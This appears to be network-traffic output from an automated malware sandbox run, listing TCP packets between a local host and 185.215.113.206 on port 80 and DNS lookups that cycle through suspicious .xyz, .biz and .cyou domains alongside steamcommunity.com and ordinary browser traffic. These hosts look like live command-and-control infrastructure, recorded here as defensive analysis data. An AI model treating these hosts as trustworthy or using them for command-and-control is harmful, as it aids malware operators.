Dec 14, 2024 23:58:47.255832911 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.255934954 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.257565975 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.257615089 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.257649899 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.257703066 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.259370089 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.259424925 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.259485006 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.259582043 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.261185884 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.261291981 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.261326075 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.261392117 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.262998104 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.263052940 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.263130903 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.263329029 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.264827967 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.264925957 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.264974117 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.265016079 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.266675949 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.266803026 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.266817093 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.266889095 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.268522978 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.268614054 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.268625021 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.268671036 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.270334959 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.270407915 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.270461082 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.270607948 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.272161007 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.272308111 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.272332907 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.272367001 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.289638042 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.289783955 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.289896011 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.289896011 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.290577888 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.290703058 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.290738106 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.290939093 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.292387962 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.292444944 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.293131113 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.293179035 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.293243885 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.293348074 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.294888020 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.295001030 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.295006990 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.295046091 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.296303034 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.296370983 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.296428919 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.296473980 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.298146963 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.298269987 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.298310041 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.298353910 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.299983978 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.300031900 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.354924917 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.355041981 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.355103970 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.355103970 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.355866909 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.355916977 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.355976105 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.356041908 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.357649088 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.357795000 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.357836962 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.357836962 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.359500885 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.359582901 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.359643936 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.359708071 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.361321926 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.361382961 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.361545086 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.362098932 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.363128901 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.363193035 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.363303900 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.363358974 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.364938974 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.365122080 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.365135908 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.365272045 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.366631985 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.366765022 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.366801023 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.366801023 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.368343115 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.368503094 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.368511915 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.368550062 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.370028019 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.370093107 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.370150089 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.370395899 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.371651888 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.371745110 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.371766090 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.371838093 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.373229027 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.373330116 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.373330116 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.373383999 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.374835968 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.374944925 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.374957085 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.375075102 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.376319885 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.376436949 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.376449108 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.376498938 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.377865076 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.377955914 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.377994061 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.378258944 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.379338026 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.379390955 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.379472017 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.379525900 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.380856991 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.380929947 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.380964994 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.381004095 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.382288933 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.382333040 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.382401943 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.382486105 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.383707047 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.383804083 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.383833885 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.383913040 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.385147095 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.385266066 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.385273933 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.385313034 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.386574030 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.386728048 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.386760950 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:47.386802912 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:47.387927055 CET	80	49855	185.215.113.206	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 14, 2024 23:58:16.290601969 CET	192.168.2.4	1.1.1.1	0x217e	Standard query (0)	shineugler.biz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:18.634605885 CET	192.168.2.4	1.1.1.1	0xd216	Standard query (0)	immureprech.biz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:20.931864023 CET	192.168.2.4	1.1.1.1	0x126d	Standard query (0)	deafeninggeh.biz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:23.524465084 CET	192.168.2.4	1.1.1.1	0x602d	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:23.779230118 CET	192.168.2.4	1.1.1.1	0x4b4e	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:24.004102945 CET	192.168.2.4	1.1.1.1	0x2daf	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:24.225217104 CET	192.168.2.4	1.1.1.1	0x757e	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:24.454767942 CET	192.168.2.4	1.1.1.1	0xe8fd	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:24.676450014 CET	192.168.2.4	1.1.1.1	0xe7c1	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:24.907854080 CET	192.168.2.4	1.1.1.1	0xd687	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:35.160017014 CET	192.168.2.4	1.1.1.1	0xdb67	Standard query (0)	tacitglibbr.biz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:41.722446918 CET	192.168.2.4	1.1.1.1	0xb7f0	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:41.937618971 CET	192.168.2.4	1.1.1.1	0x3604	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:42.212483883 CET	192.168.2.4	1.1.1.1	0xcbe2	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:42.354868889 CET	192.168.2.4	1.1.1.1	0x5e41	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:42.495271921 CET	192.168.2.4	1.1.1.1	0x4a73	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:42.635456085 CET	192.168.2.4	1.1.1.1	0xa547	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:42.776360989 CET	192.168.2.4	1.1.1.1	0x391a	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:50.604455948 CET	192.168.2.4	1.1.1.1	0x699a	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:50.604787111 CET	192.168.2.4	1.1.1.1	0xac1e	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 14, 2024 23:58:55.205147982 CET	192.168.2.4	1.1.1.1	0x22c9	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:55.742280006 CET	192.168.2.4	1.1.1.1	0x5622	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:55.882416010 CET	192.168.2.4	1.1.1.1	0x45d0	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:56.026104927 CET	192.168.2.4	1.1.1.1	0x234f	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:56.197880030 CET	192.168.2.4	1.1.1.1	0x3747	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:56.301945925 CET	192.168.2.4	1.1.1.1	0x731	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:56.338438988 CET	192.168.2.4	1.1.1.1	0x3ab2	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:56.439697981 CET	192.168.2.4	1.1.1.1	0x42ff	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 23:58:56.478240967 CET	192.168.2.4	1.1.1.1	0x28fa	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:57.271508932 CET	192.168.2.4	1.1.1.1	0x3245	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:57.271646976 CET	192.168.2.4	1.1.1.1	0xb1cd	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Dec 14, 2024 23:59:01.853941917 CET	192.168.2.4	1.1.1.1	0x76e7	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:01.854263067 CET	192.168.2.4	1.1.1.1	0xbcab	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:01.997348070 CET	192.168.2.4	1.1.1.1	0x8588	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:02.000070095 CET	192.168.2.4	1.1.1.1	0x5f6d	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:02.137707949 CET	192.168.2.4	1.1.1.1	0x4f2b	Standard query (0)	youtube.com	28	IN (0x0001)	false
Dec 14, 2024 23:59:02.145464897 CET	192.168.2.4	1.1.1.1	0xc579	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 23:59:08.095843077 CET	192.168.2.4	1.1.1.1	0xf65a	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:08.136226892 CET	192.168.2.4	1.1.1.1	0x41f4	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:08.228431940 CET	192.168.2.4	1.1.1.1	0x4c91	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:08.259274006 CET	192.168.2.4	1.1.1.1	0x4946	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:08.278978109 CET	192.168.2.4	1.1.1.1	0xe49d	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:08.367203951 CET	192.168.2.4	1.1.1.1	0x9861	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 23:59:08.417155027 CET	192.168.2.4	1.1.1.1	0xcfe	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 23:59:09.433763027 CET	192.168.2.4	1.1.1.1	0x9f15	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:09.577028036 CET	192.168.2.4	1.1.1.1	0xcaf	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 23:59:09.870722055 CET	192.168.2.4	1.1.1.1	0x7fc	Standard query (0)	shavar.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:10.235413074 CET	192.168.2.4	1.1.1.1	0x20eb	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:10.382067919 CET	192.168.2.4	1.1.1.1	0x7ffd	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:10.533806086 CET	192.168.2.4	1.1.1.1	0x4ee	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 23:59:20.326704025 CET	192.168.2.4	1.1.1.1	0x6824	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:20.327405930 CET	192.168.2.4	1.1.1.1	0x4ee4	Standard query (0)	ipv4only.arpa	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:22.288575888 CET	192.168.2.4	1.1.1.1	0x8fac	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:22.559734106 CET	192.168.2.4	1.1.1.1	0x8fac	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:24.034364939 CET	192.168.2.4	1.1.1.1	0x7985	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:30.157394886 CET	192.168.2.4	1.1.1.1	0x602c	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:30.604410887 CET	192.168.2.4	1.1.1.1	0x687f	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:30.744652033 CET	192.168.2.4	1.1.1.1	0xb6e9	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:30.886567116 CET	192.168.2.4	1.1.1.1	0xd1ea	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:31.026293039 CET	192.168.2.4	1.1.1.1	0x1a20	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:31.166028976 CET	192.168.2.4	1.1.1.1	0xf064	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:35.739386082 CET	192.168.2.4	1.1.1.1	0x5ab3	Standard query (0)	support.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:35.999099016 CET	192.168.2.4	1.1.1.1	0x5ab3	Standard query (0)	support.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:36.438039064 CET	192.168.2.4	1.1.1.1	0xadad	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:36.704086065 CET	192.168.2.4	1.1.1.1	0xadad	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:36.858841896 CET	192.168.2.4	1.1.1.1	0x2cf8	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 23:59:39.696774006 CET	192.168.2.4	1.1.1.1	0xa7f9	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:39.839555025 CET	192.168.2.4	1.1.1.1	0x951f	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:39.887264013 CET	192.168.2.4	1.1.1.1	0xcd54	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 23:59:39.996845961 CET	192.168.2.4	1.1.1.1	0x7adc	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 23:59:40.038691998 CET	192.168.2.4	1.1.1.1	0xb1b4	Standard query (0)	firefox.settings.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:40.187422991 CET	192.168.2.4	1.1.1.1	0x8077	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:40.355397940 CET	192.168.2.4	1.1.1.1	0xca21	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 23:59:40.457146883 CET	192.168.2.4	1.1.1.1	0x181a	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:40.603629112 CET	192.168.2.4	1.1.1.1	0xfd65	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 23:59:40.871596098 CET	192.168.2.4	1.1.1.1	0x17e6	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:40.871706963 CET	192.168.2.4	1.1.1.1	0xa992	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 14, 2024 23:59:42.559058905 CET	192.168.2.4	1.1.1.1	0xa8f1	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:42.778183937 CET	192.168.2.4	1.1.1.1	0xb0ba	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:42.917582035 CET	192.168.2.4	1.1.1.1	0x1257	Standard query (0)	services.addons.mozilla.org	28	IN (0x0001)	false
Dec 14, 2024 23:59:44.306895971 CET	192.168.2.4	1.1.1.1	0x95cf	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:44.439780951 CET	192.168.2.4	1.1.1.1	0xff68	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:44.439780951 CET	192.168.2.4	1.1.1.1	0x8c82	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Dec 14, 2024 23:59:44.447923899 CET	192.168.2.4	1.1.1.1	0x1b6b	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:44.588089943 CET	192.168.2.4	1.1.1.1	0xb566	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:44.728146076 CET	192.168.2.4	1.1.1.1	0x4c4b	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:44.870929003 CET	192.168.2.4	1.1.1.1	0xd337	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:45.020404100 CET	192.168.2.4	1.1.1.1	0x8e13	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:45.161376953 CET	192.168.2.4	1.1.1.1	0x17bb	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:45.452855110 CET	192.168.2.4	1.1.1.1	0x3537	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:45.452855110 CET	192.168.2.4	1.1.1.1	0x7c6a	Standard query (0)	play.google.com	65	IN (0x0001)	false
Dec 14, 2024 23:59:45.724834919 CET	192.168.2.4	1.1.1.1	0xdbfd	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 23:59:45.737885952 CET	192.168.2.4	1.1.1.1	0xa162	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 23:59:47.728513002 CET	192.168.2.4	1.1.1.1	0x5abd	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.728513002 CET	192.168.2.4	1.1.1.1	0xd0de	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.728626966 CET	192.168.2.4	1.1.1.1	0xc99c	Standard query (0)	www.wikipedia.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.869343042 CET	192.168.2.4	1.1.1.1	0x8591	Standard query (0)	youtube-ui.l.google.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.869582891 CET	192.168.2.4	1.1.1.1	0x2ee0	Standard query (0)	star-mini.c10r.facebook.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.870313883 CET	192.168.2.4	1.1.1.1	0x3867	Standard query (0)	dyna.wikimedia.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.008297920 CET	192.168.2.4	1.1.1.1	0xdf9b	Standard query (0)	star-mini.c10r.facebook.com	28	IN (0x0001)	false
